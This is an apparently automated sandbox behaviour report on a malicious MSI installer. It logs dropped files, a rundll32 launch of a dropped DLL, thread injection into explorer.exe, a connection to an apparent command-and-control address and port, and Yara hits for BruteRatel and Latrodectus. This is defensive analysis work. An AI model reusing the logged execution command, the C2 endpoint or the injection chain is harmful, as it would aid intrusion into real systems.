            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: lavi.msiStatic file information: File size 2131456 > 1048576
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp, apptext.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI25B6.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI2701.tmp, 00000004.00000000.1441195178.0000000000507000.00000002.00000001.01000000.00000003.sdmp, MSI2701.tmp, 00000004.00000002.1449357883.0000000000507000.00000002.00000001.01000000.00000003.sdmp, lavi.msi, 5d243d.msi.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: apptext.dll.2.drStatic PE information: real checksum: 0x16c5c6 should be: 0x19fb70
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E323C push ecx; ret 4_2_004E324F
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800043FA push rbp; retf 6_2_00000001800043FB
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180004437 push rbp; retf 6_2_0000000180004438
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000430A push rbp; retf 6_2_000000018000430B
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180004326 push rbp; retf 6_2_0000000180004327
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF02B8 push rsi; retf 11_2_02BF02BB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04B8 push rsi; retf 11_2_02BF04C3
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF02B0 push rbp; retf 11_2_02BF02AB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF02B0 push rbp; retf 11_2_02BF02B3
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF02A8 push rbp; retf 11_2_02BF02AB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF02E0 push r14; retf 11_2_02BF02EB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04E0 push rsi; retf 11_2_02BF04E3
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04D0 push rsi; retf 11_2_02BF04D3
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEE6CA push rcx; ret 11_2_02BEE6CB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04C8 push rsi; retf 11_2_02BF04DB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04C0 push rsi; retf 11_2_02BF04C3
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0418 push r14; retf 11_2_02BF0423
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0410 push rbp; retf 11_2_02BF0413
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0250 push rsi; retf 11_2_02BF0253
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0248 push rsi; retf 11_2_02BF024B
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0248 push rbp; retf 11_2_02BF0293
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEF197 push rsi; retf 11_2_02BEF198
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0388 push rbp; retf 11_2_02BF039B
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0380 push rbp; retf 11_2_02BF039B
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF01E0 push rbp; retf 11_2_02BF0223
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF03C8 push rsi; retf 11_2_02BF03BB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF03C8 push rbp; retf 11_2_02BF03EB
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEE537 push rbp; iretd 11_2_02BEE538
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0130 push 00000072h; retf 11_2_02BF011B
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0330 push rbp; retf 11_2_02BF0333
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF0320 push rsi; retf 11_2_02BF0323

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI2701.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25B6.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2586.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\apptext.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2527.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25D6.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2701.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25B6.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2586.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2527.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25D6.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2701.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001A9942B4D00
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,11_2_02BE8424
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,11_2_02BE7274
            Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,11_2_02BF0610
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 404Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8779Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI25B6.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2586.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\apptext.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2527.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI25D6.tmpJump to dropped file
            Source: C:\Windows\Installer\MSI2701.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-33740
            Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-26092
            Source: C:\Windows\Installer\MSI2701.tmpAPI coverage: 6.7 %
            Source: C:\Windows\explorer.exe TID: 3572Thread sleep count: 306 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3572Thread sleep time: -306000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1012Thread sleep count: 404 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1012Thread sleep time: -40400s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3572Thread sleep count: 8779 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3572Thread sleep time: -8779000s >= -30000sJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004FAF79 FindFirstFileExW,4_2_004FAF79
            Source: C:\Windows\explorer.exeCode function: 11_2_02BEA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,11_2_02BEA8E0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04B8 FindFirstFileA,11_2_02BF04B8
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF04C0 FindFirstFileW,11_2_02BF04C0
            Source: C:\Windows\explorer.exeCode function: 11_2_02BE2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,11_2_02BE2B28
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
            Source: explorer.exe, 0000000B.00000003.2866219437.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1460394613.000001A9927F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 0000000B.00000003.2866219437.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A99429CCE0 LdrGetProcedureAddress,6_2_000001A99429CCE0
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004CD0A5 IsDebuggerPresent,OutputDebugStringW,4_2_004CD0A5
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F790 OutputDebugStringA,ActivateActCtx,GetLastError,6_2_000000018001F790
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004FAD78 mov eax, dword ptr fs:[00000030h]4_2_004FAD78
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004F2DCC mov ecx, dword ptr fs:[00000030h]4_2_004F2DCC
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C2310 GetProcessHeap,4_2_004C2310
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2701.tmp "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, ObjectJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004E33A8
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E353F SetUnhandledExceptionFilter,4_2_004E353F
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004E2968
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004E6E1B
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800D50A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000001800D50A0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800DBA64 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800DBA64

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.66.76.106 8877Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject threads in other processes
            Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF4BD330100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF4BD330100
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 2BE0000Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2BE0000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 4084 base: 2BE0000 value: 4DJump to behavior
            Sets debug register (to hijack the execution of another thread)
            Source: C:\Windows\System32\rundll32.exeThread register set: 8104 1Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2BE0000Jump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004C52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_004C52F0
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001510 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,6_2_0000000180001510
            Source: explorer.exe, 0000000B.00000000.2291677099.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000B.00000000.2287787419.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000B.00000000.2291677099.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E35A9 cpuid 4_2_004E35A9
            Source: C:\Windows\Installer\MSI2701.tmpCode function: EnumSystemLocalesW,4_2_004FE0C6
            Source: C:\Windows\Installer\MSI2701.tmpCode function: EnumSystemLocalesW,4_2_004FE111
            Source: C:\Windows\Installer\MSI2701.tmpCode function: EnumSystemLocalesW,4_2_004F7132
            Source: C:\Windows\Installer\MSI2701.tmpCode function: EnumSystemLocalesW,4_2_004FE1AC
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004FE237
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetLocaleInfoEx,4_2_004E23F8
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetLocaleInfoW,4_2_004FE48A
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004FE5B3
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetLocaleInfoW,4_2_004F76AF
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetLocaleInfoW,4_2_004FE6B9
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_004FE788
            Source: C:\Windows\Installer\MSI2701.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_004FDE24
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800FA4C8
            Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_00000001800FA160
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800FA598
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00000001800FA9D8
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800EFEA8
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,6_2_00000001800F0328
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00000001800FABBC
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004E37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_004E37D5
            Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001A9942B4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001A9942B4D00
            Source: C:\Windows\Installer\MSI2701.tmpCode function: 4_2_004F7B1F GetTimeZoneInformation,4_2_004F7B1F
            Source: C:\Windows\explorer.exeCode function: 11_2_02BF00E8 RtlGetVersion,11_2_02BF00E8

            Stealing of Sensitive Information

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 8104, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Yara detected Latrodectus
            Source: Yara matchFile source: 0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
